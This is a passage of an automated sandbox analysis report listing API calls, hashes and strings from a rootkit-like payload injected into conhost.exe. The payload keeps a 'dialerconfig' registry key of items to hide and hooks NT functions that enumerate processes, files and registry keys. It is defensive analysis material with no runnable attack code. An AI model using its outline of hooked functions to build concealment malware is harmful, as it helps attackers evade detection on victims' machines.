                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981754
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB98176F
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB98178F
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9817AA
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9817CA
                                                        • Sleep.KERNEL32 ref: 000001B0BB981AD7
                                                        • SleepEx.KERNEL32 ref: 000001B0BB981ADD
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9817E5
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981805
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981820
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981840
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB98185B
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB98187B
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981896
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9818A0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3b332a6565b8913d1a5b94307b60d14a2c7ab3855f27e53c505f5ddf8de1548c
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 06316479211E6193EB729B36DF512FB73A5EB8EBD0F0854219E09C76A9FF24C8518210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 1fe10f596d52738d9bbee35dc01af9d6fbec034673a2264c63cd8e1c5355782c
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 6261F17AB41F9487DB768F1592107AEB3A2F768BA4F188121CF5987789DF38D852C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph (rendered graph not recoverable; block summary reconstructed from the extracted edge data) for function 1b0bb982b2c-1b0bb982f03
                                                        • entry 1b0bb982b2c-1b0bb982ba5 call 1b0bb9a2ce0; guard blocks 1b0bb982bab, 1b0bb982bb7 and 1b0bb982bc0 each branch to the exit 1b0bb982ee0-1b0bb982f03 on failure
                                                        • 1b0bb982bc9-1b0bb982bd9 GetModuleHandleA, then either 1b0bb982bdb call 1b0bb996090 or 1b0bb982bed, joining at 1b0bb982bf0-1b0bb982c0e
                                                        • 1b0bb982c14-1b0bb982c33 StrCmpNIW, followed by further checks at 1b0bb982c39, 1b0bb982c43 and 1b0bb982c53, each able to exit
                                                        • loop body 1b0bb982c60-1b0bb982ca7, branching at 1b0bb982cad / 1b0bb982d9d; call 1b0bb98199c at 1b0bb982cb2 and 1b0bb982dac
                                                        • 1b0bb982d3a: call 1b0bb981bbc (1b0bb982d3f) or lstrlenW (1b0bb982d4b) -> call 1b0bb98152c (1b0bb982d66) -> call 1b0bb983844 (1b0bb982d7b)
                                                        • 1b0bb982df5: call 1b0bb981bbc (1b0bb982dfa) or lstrlenW (1b0bb982e05) -> call 1b0bb98152c (1b0bb982e20) -> call 1b0bb983844 (1b0bb982e35)
                                                        • 1b0bb982e4a-1b0bb982ec9: up to three calls to 1b0bb9885c0 (1b0bb982e63, 1b0bb982e85, 1b0bb982eab) -> 1b0bb982ecc -> 1b0bb982ed2-1b0bb982eda, which loops back to 1b0bb982c60 or exits to 1b0bb982ee0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 00590ddf17dc58f79e30d81a4be9f7a403ff98a1a212a6f06faacbb71db4adcb
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: E1B18C7A210E5087EBB68F25DA407EA77A5FB4ABC4F44502AEE4997795EF35CC80C340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 2849dc2059eb21b50b3bc8f00e547e449bff6682774550356ac8cedf2aa706f6
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: C3314F76215F808AEB719F60E8807EE7365F789784F44442ADA8D97B99EF38C548C710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 11ecdf1489101479767b71cb4eb6d33861f8973a45ac2f6809f2e03d499ac284
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FE314C3A214F8097DB61DF25E9803DE73A4F789798F50012AEA9D83B99DF38C555CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: fdec7c5ebad63a9ceb2894539f6207f6aabeaf2232fef269ed000564abef1073
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: D471D73A211E1087EB629F66ED916DA33A4FB8EBC8F401115DE8E97B69DF38C454C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 950d76e7447ce618bbd3946aa32bf56122d3107040713e302d5c441cec49daa6
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F4511C3A604F8487EB65CF62EA4439B77A1F78DBD9F448129DA8A87768DF38C055C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 35038298815813c5cad0125bcd6ff06df4736fe1e42454840a99eebc41dad74b
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: B231937C100E4AA3EAA7EF69EF916E67320FB0E784F905027D85992575AF38864DC350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4a4122ede09c1619a71ee8c9c04f52e233d8f57fac6d92093c39ae32007e623b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 7681CE397A0F418BFB77AB66D6413DB36E0EBAD780F5480259A49C3796DF38C9458700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001B0BB98CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CEBC
                                                        • SetLastError.KERNEL32 ref: 000001B0BB98CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001B0BB98ECCC,?,?,?,?,000001B0BB98BF9F,?,?,?,?,?,000001B0BB987AB0), ref: 000001B0BB98CF2C
                                                          • Part of subcall function 000001B0BB98D6CC: HeapAlloc.KERNEL32 ref: 000001B0BB98D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF54
                                                          • Part of subcall function 000001B0BB98D744: HeapFree.KERNEL32 ref: 000001B0BB98D75A
                                                          • Part of subcall function 000001B0BB98D744: GetLastError.KERNEL32 ref: 000001B0BB98D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF76
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: a04337f93daf67d82fd3d6e5c187dfe476c05442b224a94c0da0768cd3122dcb
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: CF412E3D201E5843FA7B67255F553EB3152DF8F7F0F241B24A936D66E6DFA898118200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 01d9ec633aa4feef1a423ecb07b739f5a2d8ee8ca4f16215dbf00cc8c85c1c92
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 2E21413A614F4083F7618B25F65439A77A0F78EBE4F504219EA9943BA8DF3CC149CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: a4ad48564dfeffe3e1c13022fc98f4b1e646bbad5f6f294724efccc416cc11b6
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 98E18D7A604B408BEB369F65DA803DE77A0F75A7D8F101215EE8997B9ACF38D081C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 17b000218209b708ad949f5d8bb673a37b220f21f4be850ce80d16114b09203a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: B1E17A7A644B808BFB729F65D6803DE7BA4F769B98F100116EE8997B99CF34C491C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 89ecab826a941491b751d100c92843fde61a6a7982743ceed0bbd23e688cdd68
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 4641AC3A311E1083FA778B26AE487D77291FB4EBE0F59592A9D1EC7784EF38C4458210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 85f090df381a6e4279f1f3d719b2c88b04006be06cca7ecdfcf592053c64582d
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 4A414E76214F84C7E7A1CF21E94479B77A1F38DB98F448129DA8A47B58DF38C585CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 3dba319d4711e62bc3511ca93b3d234f165490b7ea34506d427e135e2bd6a5b8
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 3A114F39604A5843FA7B67259F523FB7141DF8FBF0F1457289839D66EADF68C4028210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: b3934b0978a5232d5d576f52f02f3683101d4e55fb511b034a5a54ef02d023d4
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 99817D39600E4187FBB3AB65AE813DB3691EB8FBC0F144419A949C77A6EF3CC8458711
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 513716fd9f522b5f06c6acce9ca5cf0e112c6c0d5aef5ab896f36eafcbb6a0dc
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 2431C439212E40D3EF739B02AE407E63A94F74EBE0F5915299D6E87792DF39C4558310
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: b0a81d200032d86ad38d316e1880028995d8a3141c355d29fd8f9425fb66d309
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: AB115E39214E4087E7B18B52E98435A76A0F78DFE4F044219EA9AC77A5CF78C4148744
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 411fd60a1f16dd2e88446c120427be7865b76b9799b2deab0c6ca42901cc0f25
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: FD113C3A708B4183FF659B22F5046AA72B0F749BC5F444029EE8987764EF3DC505C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 500358b5d55420f6b7e44d89d5364171a30b7326fec8f68509e9868970bc3ca9
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 02D1897A208F9882DB719B16E99439B77A0F78DBC4F110116EA8D87BA5DF3CC545CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 089657c911624ca5745a56f043cfbe9acda64173e545b2775df41812c2f17173
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: C3315F3A701F5183E666DF169A407AA7790FB4ABC4F0841249E4887B55EF34C461C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
